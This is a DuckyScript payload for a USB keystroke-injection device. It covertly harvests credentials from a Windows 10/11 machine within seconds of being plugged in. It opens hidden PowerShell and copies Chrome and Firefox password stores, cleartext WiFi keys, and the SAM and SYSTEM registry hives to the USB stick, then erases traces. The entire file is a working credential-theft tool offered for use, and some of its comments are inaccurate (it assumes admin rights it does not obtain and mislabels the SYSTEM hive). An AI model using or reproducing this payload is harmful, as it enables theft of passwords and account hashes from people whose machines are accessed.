# ============================================
# WINDOWS PASSWORDS QUICK - Grab & Go
# ============================================
# Purpose: Extract passwords in seconds
# Scenario: Plug in, wait 10s, unplug, leave
# Target: Windows 10/11
# Author: D3n14l0f53rv1c3
# ============================================

DELAY 2000

# Open PowerShell as Admin
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 3000

# Create temp directory
STRING $td = "$env:TEMP\.cache"; md $td -Force
ENTER
DELAY 200

# Grab Chrome passwords
STRING $cp = "$td\chromes.txt"; 
ENTER
DELAY 100
STRING Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -ErrorAction SilentlyContinue | Out-File $cp -Encoding UTF8
ENTER
DELAY 500

# Grab Firefox passwords
STRING $fp = "$td\ffox.txt";
ENTER
DELAY 100
STRING Get-ChildItem "$env:APPDATA\Mozilla\Firefox\Profiles\*.default*\logins.json" -ErrorAction SilentlyContinue | Copy-Item -Destination $td -Force
ENTER
DELAY 500

# Grab Windows WiFi passwords
STRING $wf = "$td\wifi.txt"; 
ENTER
DELAY 100
STRING (netsh wlan show profiles | Select-String ': (.+)' | ForEach-Object { netsh wlan show profile $_.Matches.Groups[1].Value key=clear }) | Out-File $wf
ENTER
DELAY 2000

# Grab SAM database hashes (needs admin)
STRING $sm = "$td\sam.hive";
ENTER
DELAY 100
STRING reg save HKLM\SAM $sm /Y 2>$null
ENTER
DELAY 500

# Grab LSA secrets
STRING $ls = "$td\lsa.hive";
ENTER
DELAY 100
STRING reg save HKLM\SYSTEM $ls /Y 2>$null
ENTER
DELAY 500

# Copy to USB (assuming mounted as E:)
STRING $usb = "E:\.grab";
ENTER
DELAY 100
STRING if (Test-Path E:\) { md $usb -Force; Copy-Item "$td\*" $usb -Force }
ENTER
DELAY 1000

# Clean traces
STRING Remove-Item $td -Recurse -Force -ErrorAction SilentlyContinue
ENTER
DELAY 200
STRING Clear-History
ENTER
DELAY 100
STRING exit
ENTER
